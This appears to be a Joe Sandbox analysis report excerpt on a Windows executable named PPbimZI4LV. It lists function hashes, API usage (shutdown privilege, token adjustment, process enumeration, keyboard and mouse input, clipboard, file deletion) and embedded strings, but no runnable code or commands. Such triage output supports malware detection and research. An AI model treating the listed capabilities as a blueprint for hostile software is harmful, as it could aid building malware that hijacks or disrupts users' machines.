                                                                      • Instruction ID: d1e7a7c8d4f56becf33706f52b900c96dc5b493085a4f0fb5534cc8e5e1cbb51
                                                                      • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                      • Instruction Fuzzy Hash: B061A122B186518AFB14FF61D8465EC77A4FB84B88B044035DE4EE379AEF38D949DB40
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2395222682-0
                                                                      • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction ID: 69a3d7086b9701eb36e8d5a9a307ff4a18289b7eabcdc7fde90f98de1a26f0b8
                                                                      • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction Fuzzy Hash: EED12D37B08B4686FB10BF65D4422AD63A1FB98B88B504436DE4DEBB56EF38E445D340
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction ID: 1a98537dbdd7a08855ed7bdede2a6b29e8175afbf7f7a984ef0471191852bb7a
                                                                      • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction Fuzzy Hash: A871E236609A9186EB60EF65E8456ED3760FB88B94F500132DE4DD3BA5EF3CD186D700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction ID: 1e94faa53a1ae8802cc7e9b27c4037dacbf4be5670072c244d9e4393c9f4e1ac
                                                                      • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction Fuzzy Hash: 2E413762A0CA4282EB44FB16D5963787760BF94B85F058434DA4EE77A3EF7CE0419704
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4047182710-1173974218
                                                                      • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction ID: c6f1000584c43b24895030b7cee758a521b85c2be845e01ee5a61c32c3b3b908
                                                                      • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction Fuzzy Hash: 3C814522A1CA4295FB50FF65E4421FD6B60EF84794F801032EA4EE66ABEF3CD549D700
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 4ab9c3212860d8adb67b4643888885f6fb66013b87228f696311c510e3b65074
                                                                      • Instruction ID: 179b15201813d6106804d180b2fea12fc88d10d47ead39a78c257d69033d5228
                                                                      • Opcode Fuzzy Hash: 4ab9c3212860d8adb67b4643888885f6fb66013b87228f696311c510e3b65074
                                                                      • Instruction Fuzzy Hash: A4E1B036A0CB8286EB10FF65D4412AD77A0FB88B98F504136DA4DEBB95EF38E545D700
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction ID: 7be67f22e79f189a77cc62a82357c6ddd4a6c4529acf4622619acd0180762ce4
                                                                      • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction Fuzzy Hash: 20417222A2CA4296EB50FB10E9422ED6360FF84790F901531EA5EE3697EF7CD505D700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                      • Instruction ID: 375bbadccf09bdea98c66194f4dbe00c555aa77603a6c7d9fb463d40db8816c0
                                                                      • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                      • Instruction Fuzzy Hash: 7031603661CB8186EB60EF25E8412AE73A4FB88755F500135EA9DD3B9AEF3CC5458B00
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                      • String ID: *.*
                                                                      • API String ID: 1927845040-438819550
                                                                      • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                      • Instruction ID: 69bc3ec79539c1f19bbae598565530af8ffcdb9f7f51e1b2e44e9d2755dab3e3
                                                                      • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                      • Instruction Fuzzy Hash: A1517322A0CB8296EB10FB15E8461AD63B0FB857A4F540132DE5DE379AEF3CD945D700
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF643962D60
                                                                        • Part of subcall function 00007FF64395B184: GetCurrentProcess.KERNEL32(00007FF64395B21D), ref: 00007FF64395B1B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                      • String ID: *$.$.
                                                                      • API String ID: 2518042432-2112782162
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1286766494-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2163645468-3733053543
                                                                      APIs
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF643945C43
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 389471666-631824599
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 1385522511-109567571
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2733932498-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 2000298826-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DEFINE$x
                                                                      • API String ID: 0-4035502692
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $[$\
                                                                      • API String ID: 0-3681541464
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-0
                                                                      • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                      • Instruction ID: 04b091893ba568d48027972de295f90dd65cfaaf016fd08302780b1493656303
                                                                      • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                      • Instruction Fuzzy Hash: 4AD1A433B1C28687DB64EF15E18566AB691F788789F148134CB5AE7745EF3CE881DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                      • Instruction ID: 28338aef51f9d719d233d006f15f8ab9c1325f620acfa9eb39f4527186306e49
                                                                      • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                      • Instruction Fuzzy Hash: 26516A32A0CA4685EB14FF25D4862AC77A0FB84B94F504232CA6ED37A6EF3CE551D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                      • Instruction ID: e8b38d50e0bea9fc4c8a906f61c7a723d508ef9a46f292a3d89529fe2a8f2dc2
                                                                      • Opcode Fuzzy Hash: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                      • Instruction Fuzzy Hash: 3731643260CB8586E710BF25E4412AEB760FB84B94F114531EB8D97B66DF3CD546DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 2278415577-0
                                                                      • Opcode ID: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                      • Instruction ID: 3c643579efea9a996fcef2a6a78faa90cc75ec0905d9b4136d3a4086e18e1d48
                                                                      • Opcode Fuzzy Hash: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                      • Instruction Fuzzy Hash: 6C21CF72A0CA8585D704FF26E04526977A0FB88BC4F488034CF4C93759DF78D155D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                      • Instruction ID: 8c0273bd4eded4d4cc30dc98be5f10bb8192a7c62562f51738ddd532e1b87dc4
                                                                      • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                      • Instruction Fuzzy Hash: 700100736287818FE7109F20E4563A937A0F75476EF500929E64DC6A99DF7DC158CF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                      • Instruction ID: 3f5c252aef09e4d6e572add0a238f846776cab3ff9fd8e5bcc62ae482d4a8fd8
                                                                      • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                      • Instruction Fuzzy Hash: A331AE12B1D68144E720BF32984667AA790FB50BE4F449631EE9DE7BD6EE3CD0469340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 17014623-711622031
                                                                      • Opcode ID: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
                                                                      • Instruction ID: a0603b4469240b3688d8799fe7e8e8724b57885ddbae08cf7cf99b6f8f34aa0a
                                                                      • Opcode Fuzzy Hash: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
                                                                      • Instruction Fuzzy Hash: 80218E32B0CA5681E718FB16E45226A6361FB88B94F544030DE9DDB792EF7CE482E700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      • API String ID: 15204871-0
                                                                      • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                      • Instruction ID: e3088c430892ff1f40f39de97332f799c3463d3ceed01c98fc2ab5b5432378cb
                                                                      • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                      • Instruction Fuzzy Hash: A6B19B73609B848BEB15EF29C8463687BA0F780B48F189925DA9DC37A5DF39D851C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                      • Instruction ID: 27d69d1a428898c8183324377c9769cd66047735726a0b1a47947bacc7ae1445
                                                                      • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                      • Instruction Fuzzy Hash: 0E117F72B0878182EB00FB26E1863687760FB88B90F158631DA6D97B92DF7CD4518700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                      • Instruction ID: 506cf161ed421cde193dad3ed7ef81f0aabd261245944685120dc32c2647fca0
                                                                      • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                      • Instruction Fuzzy Hash: 5DF0C861A1CA4242E7607B16F44626EA3A5FFC8795F504234EB9DD3B9AEF3CC4049B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                      • Instruction ID: 293e9a429ea89c1ce572d4948183ffb227425813bbf10130f682135be7a46c41
                                                                      • Opcode Fuzzy Hash: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                      • Instruction Fuzzy Hash: 2AF0A0A6A1CA4182EB54FB21D4133B85360FBE8B8DF244532CE1DD6256DF2CC0869600
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 0-3206640213
                                                                      • Opcode ID: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                      • Instruction ID: a7c3362cd14598ab3d7a2c54e3a94580c586287a9dbf572b14d6e8afa8bbae9e
                                                                      • Opcode Fuzzy Hash: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                      • Instruction Fuzzy Hash: 77E1C623A0C65285FB64BF2481565BD23A5FF01781F54413AEA1EE6686FF3DE9D0E310
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
